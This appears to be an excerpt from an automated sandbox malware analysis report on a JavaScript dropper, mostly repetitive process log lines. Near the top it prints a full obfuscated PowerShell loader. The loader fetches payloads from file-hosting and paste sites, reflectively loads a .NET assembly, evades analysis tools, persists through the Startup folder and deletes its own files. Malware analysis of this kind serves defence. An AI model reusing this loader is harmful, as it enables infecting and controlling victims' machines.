;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$LTkZZ = $host.Version.Major.Equals(2);If ( $LTkZZ ) {$fbKNY = ([System.IO.Path]::GetTempPath());del ($fbKNY + '\Upwin.msu');$ngsdp = 'https://files.catbox.moe/sakuuo.msu';$menos = 'https://files.catbox.moe/6sdjc5.msu';$EhgVw = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $EhgVw ) {$ngsdp = $menos ;}else {$ngsdp = ($ngsdp) ;};$ykhyn = ( New-Object Net.WebClient ) ;$ykhyn.Encoding = [System.Text.Encoding]::UTF8 ;$ykhyn.DownloadFile($ngsdp, ($fbKNY + '\Upwin.msu') ) ;$fVDsW = ( 'C:\Users\' + [Environment]::UserName );$bJTXj = ( $fbKNY + '\Upwin.msu' ) ; powershell.exe wusa.exe $bJTXj /quiet /norestart ; Copy-Item 'C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js' -Destination ( $fVDsW + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$Stringbase;Function BaseMy{;$EATVh = [System.Text.Encoding]::UTF8.GetString([system.Convert]::FromBase64String($Stringbase));return $EATVh;};$nhqvr = ('https://pastebin.com/raw/bYrRPs5M' );$cZNqf = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$vfjrD = $webClient.DownloadString( $nhqvr ) ;$Stringbase = $vfjrD; $vfjrD = BaseMy;$vfjrD | Out-File -FilePath $cZNqf -Encoding 'UTF8' -force ;$lyjkG = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$BKrSR = New-Object System.Net.WebClient ;$BKrSR.Encoding = [System.Text.Encoding]::UTF8 ;$nFuQG = ( Get-Content -Path $cZNqf ) ;$lDMXc = $BKrSR.DownloadData( $nFuQG ) ;$SXRcf = [System.Text.Encoding]::UTF8.GetString($lDMXc);$SXRcf | Out-File -FilePath $lyjkG -force ;$EuTZA = '$tfYIo = ( [System.IO.Path]::GetTempPath() + ''dll02.txt'') ;$ryaeG = (Get-Content -Path $tfYIo -Encoding UTF8);' ;$EuTZA += '[Byte[]] $EATVh = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$EuTZA += '[System.AppDomain]:' + ':CurrentDomain.Load( $EATVh ).' ;$EuTZA += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$EuTZA += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''txt.5202-YzX-dAeRpS-MeR/moc.seplaenohreruemed//:sptth'' , ''C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js'' , ''D DDc:\windows\microsoft.net\framework\v4.0.30319\addinprocess32'' ) );';$XvCTi = ([System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$EuTZA | Out-File -FilePath $XvCTi -force ;powershell -ExecutionPolicy Bypass -File $XvCTi ;};"
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmpJump to dropped file
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

              Hooking and other Techniques for Hiding and Protection

              barindex
              Self deletion via cmd or bat file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js & del "1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL01.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL02.txt"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n 1 & del "C:\Users\user\AppData\Local\Temp\DLL31.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c ping 127.0.0.1 -n C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js & del "1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: cmd.exe /c del "C:\Users\user\Downloads\F-2025-0855\F-2025-0855.js"
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
